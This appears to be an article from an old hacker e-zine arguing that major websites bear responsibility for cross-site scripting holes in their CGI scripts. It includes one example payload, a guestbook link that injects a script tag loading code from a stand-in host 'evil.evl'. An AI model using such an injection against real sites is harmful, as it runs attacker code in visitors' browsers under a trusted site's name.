
                                                     
                                                       
               ۰߰     ܰ۰  
             ۱      ܱ߰    ۰
             ۱          ۱      ۰  
                 ܰ߱    ߰۲    
               Outbreak Magazine Issue #7 - Article 10 of 16
           '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'


######################################################################
###########  responsibilities of trusted hosts -dropcode  ############
######################################################################

just  as  in  real  life,  here  on  the  internet we mustn't make the 
assumption  that  we  can  fall  vitcim  only to our own insecurities. 
often, it is the insecurities of others that target us as victims.

what  follows  is  the  opinion of the writer and does not necessarily 
reflect  the  opinions  of  the  publisher,  however  it  might... and 
probably should. *smirk*

a  certain  class of vulnerability, known as cross-site scripting, has
been  increasingly  potent  on  the  internet over the last two years. 
since  its original recognition by CERT in February of 2000 cross-site
scripting  vulnerabilities  have surfaced in thousands of websites all
accross the web.

cross-site  scripting  takes advantage of weak verification procedures
when  dynamically  constructing webpages containing user-entered data.
this  vulnerability  makes  it  possible  to embed malicious code into 
websites with poorly written cgis.

----------------------------------------------------------------------
    <a href="http://trustedhost.com/guestbook.cgi? comment=         
        <script src='http://evil.evl/evilcode'></script>">!!!</a>   
----------------------------------------------------------------------

the  attack  itself  is simple, the solution to the problem is simple, 
but  the  implications and impact of the vulnerability are tremendous.

simply  passing  malicious  code  as  an attribute to a vulnerable cgi 
will cause the user to inadvertently execute the code.

for  those having trouble grasping this, consider the following. sure, 
malicious  code  has  been a problem for promiscuous websurfers for as 
long as malicious coders have been making webpages, but when malicious 
code  can  be  embeded into webpages that are trusted by even the most 
wary websurfers, thats when it becomes epidemic.

cross-site  scripting  vulnerabilities  have been found on some of the
most  widely  trusted  hosts  on  the internet. Microsoft, NBC, Lycos, 
Excite, CNet, Netscape, Ebay, and plenty more.

now,  imagine visiting a site with as much credibility as those listed
above and coming away from it with a virus. where does the blame go?

considering the amount of dependency people put on personal computers, 
and the amount of traffic generated by sites so credible, compensation
for  loss  is  probably very daunting in the eyes of the organizations
who  own those websites, and whos weak programming was exploited. this
is probably why they always use the malicious coders as the scapegoat.

don't get me wrong, of course those putting malicious code into effect
should  be held responsible for the damage they cause, but i also feel 
that  a  certain  amount  of  responsability  comes with self-promoted 
credibility.  after all, the damage could have been easily avoided had 
their cgis filtered the certain tags. 

i  suppose  the  only  real  purpose  this  text has is to educate the 
audience  of  the  great  injustice presented when large organizations 
can  mass-promote  themselves,  and not take responsibility when their 
insecurities victimize people.

*shrugs* i guess thats big business.

----------------------------------------------------------------------

greets go to savvyD,  ramb0x,  gr3p, kleptic, dirv, jenny, lexi, lenny
	     turb,   oj,  smiley, snad... anyone i'm forgettin, sorry. 

----------------------------------------------------------------------